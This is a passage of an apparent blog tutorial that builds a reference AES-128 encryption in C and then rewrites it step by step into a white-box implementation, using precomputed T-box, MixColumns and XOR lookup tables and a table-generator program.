0xEE, 0xEF, 0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF },
        { 0x00, 0x02, 0x04, 0x06, 0x08, 0x0A, 0x0C, 0x0E, 0x10, 0x12, 0x14, 0x16, 0x18, 0x1A, 0x1C, 0x1E, 0x20, 0x22, 0x24, 0x26, 0x28, 0x2A, 0x2C, 0x2E, 0x30, 0x32, 0x34, 0x36, 0x38, 0x3A, 0x3C, 0x3E, 0x40, 0x42, 0x44, 0x46, 0x48, 0x4A, 0x4C, 0x4E, 0x50, 0x52, 0x54, 0x56, 0x58, 0x5A, 0x5C, 0x5E, 0x60, 0x62, 0x64, 0x66, 0x68, 0x6A, 0x6C, 0x6E, 0x70, 0x72, 0x74, 0x76, 0x78, 0x7A, 0x7C, 0x7E, 0x80, 0x82, 0x84, 0x86, 0x88, 0x8A, 0x8C, 0x8E, 0x90, 0x92, 0x94, 0x96, 0x98, 0x9A, 0x9C, 0x9E, 0xA0, 0xA2, 0xA4, 0xA6, 0xA8, 0xAA, 0xAC, 0xAE, 0xB0, 0xB2, 0xB4, 0xB6, 0xB8, 0xBA, 0xBC, 0xBE, 0xC0, 0xC2, 0xC4, 0xC6, 0xC8, 0xCA, 0xCC, 0xCE, 0xD0, 0xD2, 0xD4, 0xD6, 0xD8, 0xDA, 0xDC, 0xDE, 0xE0, 0xE2, 0xE4, 0xE6, 0xE8, 0xEA, 0xEC, 0xEE, 0xF0, 0xF2, 0xF4, 0xF6, 0xF8, 0xFA, 0xFC, 0xFE, 0x1B, 0x19, 0x1F, 0x1D, 0x13, 0x11, 0x17, 0x15, 0x0B, 0x09, 0x0F, 0x0D, 0x03, 0x01, 0x07, 0x05, 0x3B, 0x39, 0x3F, 0x3D, 0x33, 0x31, 0x37, 0x35, 0x2B, 0x29, 0x2F, 0x2D, 0x23, 0x21, 0x27, 0x25, 0x5B, 0x59, 0x5F, 0x5D, 0x53, 0x51, 0x57, 0x55, 0x4B, 0x49, 0x4F, 0x4D, 0x43, 0x41, 0x47, 0x45, 0x7B, 0x79, 0x7F, 0x7D, 0x73, 0x71, 0x77, 0x75, 0x6B, 0x69, 0x6F, 0x6D, 0x63, 0x61, 0x67, 0x65, 0x9B, 0x99, 0x9F, 0x9D, 0x93, 0x91, 0x97, 0x95, 0x8B, 0x89, 0x8F, 0x8D, 0x83, 0x81, 0x87, 0x85, 0xBB, 0xB9, 0xBF, 0xBD, 0xB3, 0xB1, 0xB7, 0xB5, 0xAB, 0xA9, 0xAF, 0xAD, 0xA3, 0xA1, 0xA7, 0xA5, 0xDB, 0xD9, 0xDF, 0xDD, 0xD3, 0xD1, 0xD7, 0xD5, 0xCB, 0xC9, 0xCF, 0xCD, 0xC3, 0xC1, 0xC7, 0xC5, 0xFB, 0xF9, 0xFF, 0xFD, 0xF3, 0xF1, 0xF7, 0xF5, 0xEB, 0xE9, 0xEF, 0xED, 0xE3, 0xE1, 0xE7, 0xE5 },
        { 0x00, 0x03, 0x06, 0x05, 0x0C, 0x0F, 0x0A, 0x09, 0x18, 0x1B, 0x1E, 0x1D, 0x14, 0x17, 0x12, 0x11, 0x30, 0x33, 0x36, 0x35, 0x3C, 0x3F, 0x3A, 0x39, 0x28, 0x2B, 0x2E, 0x2D, 0x24, 0x27, 0x22, 0x21, 0x60, 0x63, 0x66, 0x65, 0x6C, 0x6F, 0x6A, 0x69, 0x78, 0x7B, 0x7E, 0x7D, 0x74, 0x77, 0x72, 0x71, 0x50, 0x53, 0x56, 0x55, 0x5C, 0x5F, 0x5A, 0x59, 0x48, 0x4B, 0x4E, 0x4D, 0x44, 0x47, 0x42, 0x41, 0xC0, 0xC3, 0xC6, 0xC5, 0xCC, 0xCF, 0xCA, 0xC9, 0xD8, 0xDB, 0xDE, 0xDD, 0xD4, 0xD7, 0xD2, 0xD1, 0xF0, 0xF3, 0xF6, 0xF5, 0xFC, 0xFF, 0xFA, 0xF9, 0xE8, 0xEB, 0xEE, 0xED, 0xE4, 0xE7, 0xE2, 0xE1, 0xA0, 0xA3, 0xA6, 0xA5, 0xAC, 0xAF, 0xAA, 0xA9, 0xB8, 0xBB, 0xBE, 0xBD, 0xB4, 0xB7, 0xB2, 0xB1, 0x90, 0x93, 0x96, 0x95, 0x9C, 0x9F, 0x9A, 0x99, 0x88, 0x8B, 0x8E, 0x8D, 0x84, 0x87, 0x82, 0x81, 0x9B, 0x98, 0x9D, 0x9E, 0x97, 0x94, 0x91, 0x92, 0x83, 0x80, 0x85, 0x86, 0x8F, 0x8C, 0x89, 0x8A, 0xAB, 0xA8, 0xAD, 0xAE, 0xA7, 0xA4, 0xA1, 0xA2, 0xB3, 0xB0, 0xB5, 0xB6, 0xBF, 0xBC, 0xB9, 0xBA, 0xFB, 0xF8, 0xFD, 0xFE, 0xF7, 0xF4, 0xF1, 0xF2, 0xE3, 0xE0, 0xE5, 0xE6, 0xEF, 0xEC, 0xE9, 0xEA, 0xCB, 0xC8, 0xCD, 0xCE, 0xC7, 0xC4, 0xC1, 0xC2, 0xD3, 0xD0, 0xD5, 0xD6, 0xDF, 0xDC, 0xD9, 0xDA, 0x5B, 0x58, 0x5D, 0x5E, 0x57, 0x54, 0x51, 0x52, 0x43, 0x40, 0x45, 0x46, 0x4F, 0x4C, 0x49, 0x4A, 0x6B, 0x68, 0x6D, 0x6E, 0x67, 0x64, 0x61, 0x62, 0x73, 0x70, 0x75, 0x76, 0x7F, 0x7C, 0x79, 0x7A, 0x3B, 0x38, 0x3D, 0x3E, 0x37, 0x34, 0x31, 0x32, 0x23, 0x20, 0x25, 0x26, 0x2F, 0x2C, 0x29, 0x2A, 0x0B, 0x08, 0x0D, 0x0E, 0x07, 0x04, 0x01, 0x02, 0x13, 0x10, 0x15, 0x16, 0x1F, 0x1C, 0x19, 0x1A }
    };

    for (size_t i = 0; i < 4; ++i)
    {
        unsigned char a = out[i * 4 + 0];
        unsigned char b = out[i * 4 + 1];
        unsigned char c = out[i * 4 + 2];
        unsigned char d = out[i * 4 + 3];

        out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
        out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
        out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
        out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];
    }
}

Combine them together

Now we have everything we need, it is going to be easy peasy ; really:

  1. The initial state is populated with the encryption key
  2. Generate the round-keys thanks to the key schedule ; remember 11 keys, the first one being the plain encryption key
  3. The first different round is a simple AddRoundKey operation
  4. Then we enter in the main loop which does 9 rounds:
    1. SubBytes
    2. ShiftRows
    3. MixColumns
    4. AddRoundKey
  5. Last round which is also a bit different:
    1. SubBytes
    2. ShiftRows
    3. AddRoundKey
  6. The state is now your encrypted block, yay!

Here we are, we finally have our AES128 encryption function that we will use as a reference:

void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
    unsigned int d;
    unsigned char round_keys[11][16] = { 0 };
    const unsigned char rcon[] = { 0x00, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D, 0x01, 0x02, 0x04, 0x08, 0x10, 0x20, 0x40, 0x80, 0x1B, 0x36, 0x6C, 0xD8, 0xAB, 0x4D, 0x9A, 0x2F, 0x5E, 0xBC, 0x63, 0xC6, 0x97, 0x35, 0x6A, 0xD4, 0xB3, 0x7D, 0xFA, 0xEF, 0xC5, 0x91, 0x39, 0x72, 0xE4, 0xD3, 0xBD, 0x61, 0xC2, 0x9F, 0x25, 0x4A, 0x94, 0x33, 0x66, 0xCC, 0x83, 0x1D, 0x3A, 0x74, 0xE8, 0xCB, 0x8D };

    /// Key schedule -- Generate one subkey for each round
    /// http://www.formaestudio.com/rijndaelinspector/archivos/Rijndael_Animation_v4_eng.swf

    // First round-key is the actual key
    memcpy(&round_keys[0][0], key, 16);
    d = DW(&round_keys[0][12]);
    for (size_t i = 1; i < 11; ++i)
    {
        // Rotate `d` 8 bits to the right
        d = ROT(d);

        // Takes every bytes of `d` & substitute them using `S_box`
        unsigned char a1, a2, a3, a4;
        // Do not forget to xor this byte with `rcon[i]`
        a1 = S_box[(d >> 0) & 0xff] ^ rcon[i]; // a1 is the LSB
        a2 = S_box[(d >> 8) & 0xff];
        a3 = S_box[(d >> 16) & 0xff];
        a4 = S_box[(d >> 24) & 0xff];

        d = (a1 << 0) | (a2 << 8) | (a3 << 16) | (a4 << 24);

        // Now we can generate the current roundkey using the previous one
        for (size_t j = 0; j < 4; j++)
        {
            d ^= DW(&(round_keys[i - 1][j * 4]));
            *(unsigned int*)(&(round_keys[i][j * 4])) = d;
        }
    }

    /// Dig in now
    /// The initial round is just AddRoundKey with the first one (being the encryption key)
    memcpy(out, in, 16);
    AddRoundKey(round_keys[0], out);

    /// Let's start the encryption process now
    for (size_t i = 1; i < 10; ++i)
    {
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
        AddRoundKey(round_keys[i], out);
    }

    /// Last round which is a bit different
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Not that bad right? And we can even prepare a function that tests if the encrypted block is valid or not (this is really going to be useful as soon as we start to tweak the implementation):

unsigned char tests()
{
    /// AES128ENC
    {
        unsigned char key[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c };
        unsigned char out[16] = { 0 };
        unsigned char plain[16] = { 0x32, 0x43, 0xf6, 0xa8, 0x88, 0x5a, 0x30, 0x8d, 0x31, 0x31, 0x98, 0xa2, 0xe0, 0x37, 0x07, 0x34 };
        unsigned char expected[16] = { 0x39, 0x25, 0x84, 0x1d, 0x02, 0xdc, 0x09, 0xfb, 0xdc, 0x11, 0x85, 0x97, 0x19, 0x6a, 0x0b, 0x32 };
        printf("> aes128_enc_base ..");
        aes128_enc_base(plain, out, key);
        if (memcmp(out, expected, 16) != 0)
        {
            printf("FAIL\n");
            return 0;
        }
        printf("OK\n");
    }

    return 1;
}

Brilliant.

White-boxing AES128 in ~7 steps

Introduction

I'm no crypto-expert whatsoever but I'll still try to explain what "white-boxing" AES means for us. Currently, we have a block encryption primitive with the following signature void aes128_enc_base(unsigned char in[16], unsigned char out[16], unsigned char key[16]). One of the purpose of the white-boxing process is going to "remove", or I should say "hide" instead, the key. Your primitive will work without any input key parameter, but the key won't be hard-coded either in the body of the function. You'll be able to encrypt things without any apparent key.

A perfectly secure but unpractical version of a white-box AES would be to have a big hash-table: the keys would be every single possible plain-texts and the values would be their encrypted version with the key you want. That should give you a really clear idea of what a white-box is. But obviously storing that kind of table in memory is another problem by itself :-).

Instead of using that "naive" idea, researchers came up with way to pre-compute "things" that involve the round-keys in order to hide everything. The other goal of a real white-box is to be resistant to reverse-engineering & dynamic/static analysis. Even if you are able to read whatever memory you want, you still should not be able to extract the key. The NoSuchCon2013 crackme is again a really good example of that: we had to wait for 2 years before @doegox actually works his magic to extract the key.

The design of the implementation is really really important in order to make that key extraction process the most difficult.

In this part, we are using James A. Muir's paper to rewrite step by step our implementation in order to make it possible to combine several operations between them & make pre-computed table out of them. At the end of this part we should have a working AES128 encryption primitive that doesn't require an hard-coded key. But we will also build in parallel a tool used to generate the different tables our implementation is going to need: obviously, this tool is going to need both the key schedule & the encryption key to be able to generate the look-up tables. Long story short: the first steps are basically going to reorder / rewrite the logic of the encryption, & the last ones will really transform the implementation in a white-box.

Anyway, let's go folks!

Step 1: bring the first AddRoundKey in the loop & kick out the last one out of it

This one is really easy: basically we just have to change our loop to start at i=0 until i=8 (inclusive), move the first AddRoundKey in the loop, and move the last one outside of it.

The encryption loop should look like this now:

void aes128_enc_reorg_step1(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        ShiftRows(out);
        MixColumns(out);
    }

    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    ShiftRows(out);
    AddRoundKey(round_keys[10], out);
}

Step 2: SubBytes then ShiftRows equals ShiftRows then SubBytes

Yet another easy one: because SubBytes is just replacing a byte by its substitution (stored in S_box), you can apply ShiftRows before SubBytes or SubBytes before ShiftRows ; you will get the same result. So let's exchange them:

void aes128_enc_reorg_step2(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        AddRoundKey(round_keys[i], out);
        ShiftRows(out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    AddRoundKey(round_keys[9], out);
    ShiftRows(out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}

Step 3: ShiftRows first, but needs to ShiftRows the round-key

This one is a bit more tricky, but again it's more about reordering, rewriting the encryption loop than really replacing computation by look-up tables so far. Basically, the idea of this step is to start the encryption loop with a ShiftRows operation. Because of the way this operation is defined, if you put it first you also need to apply ShiftRows to the current round key in order to get the same result than AddRoundKey/ShiftRows.

void aes128_enc_reorg_step3(unsigned char in[16], unsigned char out[16], unsigned char key[16])
{
[...]
    /// Key schedule -- Generate one subkey for each round
[...]
    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);
        ShiftRows(round_keys[i]);
        AddRoundKey(round_keys[i], out);
        SubBytes(out);
        MixColumns(out);
    }

    /// Last round which is a bit different
    ShiftRows(out);
    ShiftRows(round_keys[9]);
    AddRoundKey(round_keys[9], out);
    SubBytes(out);
    AddRoundKey(round_keys[10], out);
}

Step 4: White-boxing it like it's hot, White-boxing it like it's hot

This step is a really important one for us, it's actually the first one where we are going to be able to both remove the key & start the tables generator project. The tables generator project basically generates everything we need to have our white-box AES encryption working.

Now we don't need the key schedule anymore in the AES encryption function (but obviously we will need it on the table generator side), and we can keep only the encryption loop.

The transformation introduced in this step is to create a look-up table that will replace ShiftRows(round_keys[i])/AddRoundKey/SubBytes. We can clearly see now how our round keys are going to be "diffused" & combined with different operations to make them "not trivially" extractable (in fact they are, but let's say they are not right now). In order to have such a table, we need quite some space though: basically we need this table Tboxes[10][16][0x100]. We have 10 operations ShiftRows(round_keys[i])/AddRoundKey/SubBytes, 16 bytes of round keys in each one of them and the 0x100 for the bytes ([0x00-0xFF]) than can be encrypted.

The computation is not really hard:

  1. We compute the key schedule for a specific encryption key
  2. We populate the table this way:
    1. For each round key:
    2. For every byte possible:
      1. You compute S_box[byte ^ ShiftRows(roundkey)[i]]

The S_box part is for the SubBytes operation, the xor with one byte of the round key is for AddRoundKey & the rest is for ShiftRows(round_keys[i]). There is a special case for the 9th round key, where you have to include AddRoundKey of the latest round key. It's like we don't have 11 rounds anymore, but 10 now. As the 9th contains information about the round key 9th & 10th.

If you are confused about that bit, don't be ; it's just I suck at explaining things, but just have a look at the following code (especially at lines 47, 48):

int main()
{
    unsigned char key[16] = "0vercl0k@doare-e";
    unsigned char plain_block[16] = "whatdup folks???";
    unsigned char round_keys[11][16] = { 0 };

    /// 10 -> we have 10 rounds
    /// 16 -> we have 16 bytes of round keys
    /// 0x100 -> we have to be able to encrypt every plain-text input byte [0-0xff]
    unsigned char Tboxes[10][16][0x100] = { 0 };

    key_schedule(key, round_keys);

    /// Remember we have 10 rounds & we want to combine AddRoundKey & SubBytes
    /// which is really simple.
    /// These so-called T-boxes are defined as follows:
    /// Tri(x) = S[x ^ ShiftRows(rk)[i]] ; r being the round number ([0-8]), x being the byte of plaintext, rk the roundkey & i the index ([0-15])
    printf("#pragma once\n");
    printf("// Table for key='%.16s'\n", key);
    printf("const unsigned char Tboxes[10][16][0x100] = \n{\n");
    for (size_t r = 0; r < 10; ++r)
    {
        printf("  {\n");

        ShiftRows(round_keys[r]);

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                Tboxes[r][i][x] = S_box[x ^ round_keys[r][i]];
                /// We need to include the bytes from the roundkey 10 to replace that:
                ///  ShiftRows(out);
                ///  ShiftRows(round_keys[9]);
                ///  AddRoundKey(round_keys[9], out);
                ///  SubBytes(out);
                ///  AddRoundKey(round_keys[10], out);
                ///
                /// By
                /// ShiftRows(out);
                /// for (size_t j = 0; j < 16; ++j)
                ///     out[j] = Tboxes[9][j][out[j]];
                if (r == 9)
                    Tboxes[r][i][x] ^= round_keys[10][i];

                printf("0x%.2x", Tboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }
            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 10)
            printf(",");
        printf("\n");
    }
    printf("};\n\n");
}

Now that we have this table created, we just need to actually use it in our encryption. Thanks to this table, the encryption loop is way more simple and pretty, check it out:

void aes128_enc_wb_step1(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        MixColumns(out);
    }

    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 5: Transforming MixColumns in a look-up table

OK, so this is maybe the "most difficult" part of the game: we have to transform our ugly MixColumn function in four look-up tables. Basically, we want to transform this:

out[i * 4 + 0] = gmul[matrix[0]][a] ^ gmul[matrix[1]][b] ^ gmul[matrix[2]][c] ^ gmul[matrix[3]][d];
out[i * 4 + 1] = gmul[matrix[4]][a] ^ gmul[matrix[5]][b] ^ gmul[matrix[6]][c] ^ gmul[matrix[7]][d];
out[i * 4 + 2] = gmul[matrix[8]][a] ^ gmul[matrix[9]][b] ^ gmul[matrix[10]][c] ^ gmul[matrix[11]][d];
out[i * 4 + 3] = gmul[matrix[12]][a] ^ gmul[matrix[13]][b] ^ gmul[matrix[14]][c] ^ gmul[matrix[15]][d];

by this (where Ty[0-4] are the look-up tables I mentioned just above):

DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];

We know that gmul[X] gives you 1 byte, and we can see those four lines use gmul[X][a] where X is constant. You can also see that basically those four lines take 4 bytes as input a, b, c & d and will generate 4 bytes as output.

The idea is to combine gmul[matrix[0]][a], gmul[matrix[4]][a], gmul[matrix[8]][a] & gmul[matrix[12]][a] inside a single double-word. We do the same for b, c & d so that we can directly apply the xor operation between double-words now ; the result will also be a double-word so we have our 4 output bytes. We just re-factorized 4 individual computations (1 byte as input, 1 byte as output) into a single one (4 bytes as input, 4 bytes as output).

With that in mind, the tables generation function writes nearly by itself:

int main()
{
[...]
    typedef union
    {
        unsigned char b[4];
        unsigned int i;
    } magic_int;

    /// 4 -> four rows MC
    /// 0x100 -> for every char
    unsigned int Ty[4][0x100] = { 0 };
    printf("const unsigned int Ty[4][16][0x100] =\n{\n");
    for (size_t i = 0; i < 4; ++i)
    {
        printf("  {\n    ");
        for (size_t j = 0; j < 0x100; ++j)
        {
            if (j != 0 && (j % 16) == 0)
                printf("\n    ");

            magic_int mi;

            mi.b[0] = gmul[matrix[i + 0]][j];
            mi.b[1] = gmul[matrix[i + 4]][j];
            mi.b[2] = gmul[matrix[i + 8]][j];
            mi.b[3] = gmul[matrix[i + 12]][j];

            Ty[i][j] = mi.i;

            printf("0x%.8x", Ty[i][j]);
            if ((j + 1) < 0x100)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 4)
            printf(",");
        printf("\n");
    }
    printf("};\n");
}

Glad to replace that MixColumn call now:

void aes128_enc_wb_step2(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 16; ++j)
        {
            unsigned char x = Tboxes[i][j][out[j]];
            out[j] = x;
        }

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

You can even make it cleaner by merging the two inner-loops & make them both handle 4 bytes of data by 4 bytes of data:

// Unified the loops by treating the state 4 bytes by 4 bytes
void aes128_enc_wb_step3(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            DW(&out[j * 4]) = Ty[0][a] ^ Ty[1][b] ^ Ty[2][c] ^ Ty[3][d];
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 6: Adding a little xor table

This step is a really simple one (& kind of useless) ; we just want to transform the xor operation between 2 double-words by a look-up table that does that between 2 nibbles (4 bits). Basically, you combine 8 nibbles to get a full double-word with or operations & some binary shifts. Easy peasy:

int main()
{
[...]
    /// Xor Tables
    /// Basically takes two nibbles in input & generate a nibble in output (x^y)
    unsigned char Xor[0x10][0x10] = { 0 };
    printf("const unsigned char Xor[0x10][0x10] =\n{\n");
    for (size_t i = 0; i < 0x10; ++i)
    {
        printf("  {\n    ");

        for (size_t j = 0; j < 0x10; ++j)
        {
            if (j != 0 && (j % 8) == 0)
                printf("\n    ");

            Xor[i][j] = i ^ j;
            printf("0x%.1x", Xor[i][j]);
            if ((j + 1) < 0x10)
                printf(", ");
        }

        printf("\n  }");
        if ((i + 1) < 0x10)
            printf(",");
        printf("\n");
    }
    printf("};\n");
    return EXIT_SUCCESS;
}

Which is directly used by our implementation:

void aes128_enc_wb_step4(unsigned char in[16], unsigned char out[16])
{
    memcpy(out, in, 16);

    /// Let's start the encryption process now
    for (size_t i = 0; i < 9; ++i)
    {
        ShiftRows(out);

        for (size_t j = 0; j < 4; ++j)
        {
            unsigned char a = out[j * 4 + 0];
            unsigned char b = out[j * 4 + 1];
            unsigned char c = out[j * 4 + 2];
            unsigned char d = out[j * 4 + 3];

            a = out[j * 4 + 0] = Tboxes[i][j * 4 + 0][a];
            b = out[j * 4 + 1] = Tboxes[i][j * 4 + 1][b];
            c = out[j * 4 + 2] = Tboxes[i][j * 4 + 2][c];
            d = out[j * 4 + 3] = Tboxes[i][j * 4 + 3][d];

            unsigned int aa = Ty[0][a];
            unsigned int bb = Ty[1][b];
            unsigned int cc = Ty[2][c];
            unsigned int dd = Ty[3][d];

            out[j * 4 + 0] = (Txor[Txor[(aa >>  0) & 0xf][(bb >>  0) & 0xf]][Txor[(cc >>  0) & 0xf][(dd >>  0) & 0xf]])  | ((Txor[Txor[(aa >>  4) & 0xf][(bb >>  4) & 0xf]][Txor[(cc >>  4) & 0xf][(dd >>  4) & 0xf]]) << 4);
            out[j * 4 + 1] = (Txor[Txor[(aa >>  8) & 0xf][(bb >>  8) & 0xf]][Txor[(cc >>  8) & 0xf][(dd >>  8) & 0xf]])  | ((Txor[Txor[(aa >> 12) & 0xf][(bb >> 12) & 0xf]][Txor[(cc >> 12) & 0xf][(dd >> 12) & 0xf]]) << 4);
            out[j * 4 + 2] = (Txor[Txor[(aa >> 16) & 0xf][(bb >> 16) & 0xf]][Txor[(cc >> 16) & 0xf][(dd >> 16) & 0xf]])  | ((Txor[Txor[(aa >> 20) & 0xf][(bb >> 20) & 0xf]][Txor[(cc >> 20) & 0xf][(dd >> 20) & 0xf]]) << 4);
            out[j * 4 + 3] = (Txor[Txor[(aa >> 24) & 0xf][(bb >> 24) & 0xf]][Txor[(cc >> 24) & 0xf][(dd >> 24) & 0xf]])  | ((Txor[Txor[(aa >> 28) & 0xf][(bb >> 28) & 0xf]][Txor[(cc >> 28) & 0xf][(dd >> 28) & 0xf]]) << 4);
        }
    }

    /// Last round which is a bit different
    ShiftRows(out);

    for (size_t j = 0; j < 16; ++j)
    {
        unsigned char x = Tboxes[9][j][out[j]];
        out[j] = x;
    }
}

Step 7: Combining TBoxes & Ty tables

The last step aims to combine the Tboxes with Ty tables and if you look at the code it doesn't seem really hard. We basically want the table to work this way: 1 byte as input (a for example in the previous code) & generate 4 bytes of outputs.

To compute such a table, you need to compute the Tboxes (or not, you can compute everything without relying on the Tboxes ; it's actually what I'm doing), & then you compute Ty[Y][Tboxes[i][j][X]] ; this is it, roughly. X, i and j are the unknown variables here, which means we will end-up with a table like that:

const unsigned int Tyboxes[9][16][0x100];

Makes sense right?

So here is the code that generates that big table:

int main()
{
[...]
    /// Tyboxes
    /// It's basically Tybox(Tboxes(x))
    unsigned int Tyboxes[9][16][0x100] = { 0 };
    printf("const unsigned int Tyboxes[9][16][0x100] =\n{\n");
    for (size_t r = 0; r < 9; ++r)
    {
        printf("  {\n");

        // ShiftRows(round_keys[r]); <- don't forget we already executed that to compute the Tboxes

        for (size_t i = 0; i < 16; ++i)
        {
            printf("    {\n      ");
            for (size_t x = 0; x < 0x100; ++x)
            {
                if (x != 0 && (x % 16) == 0)
                    printf("\n      ");

                unsigned char c = S_box[x ^ round_keys[r][i]];
                Tyboxes[r][i][x] = Ty[i % 4][c];

                printf("0x%.8x", Tyboxes[r][i][x]);
                if ((x + 1) < 0x100)
                    printf(", ");
            }

            printf("\n    }");
            if ((i + 1) < 16)
                printf(",");

            printf("\n");
        }
        printf("  }");
        if ((r + 1) < 10)
            printf(",");
        printf("\n");
    }
    printf("};\n");

    printf("const unsigned char Tboxes_[16][0x100] = \n{\n");
    for (size_t i = 0; i < 16; ++i)
    {
        printf("  {\n    ");
        for (size_t x = 0; x < 0x100; ++x)
        {
            if (x != 0 && (x % 16) == 0)
                printf("\n    ");

            Tboxes[9][i][x] = S_box[x ^ round_keys[9][i]] ^ round_keys[10][i];
            printf("0x%.2x", Tboxes[9][i][x]);
            if ((x + 1) < 0x100)
                printf(", ");
        }
        printf("\n  }");
        if ((i + 1) < 16)
            printf(",");

        printf("\n");
    }

    printf("};\n\n");
    return EXIT_SUCCESS;
}

We just have to take care of the last round which is a bit different as we saw earlier, but no biggie.

Final code

Yeah, finally, here we are ; the final code of our (not protected) AES128 white-box:

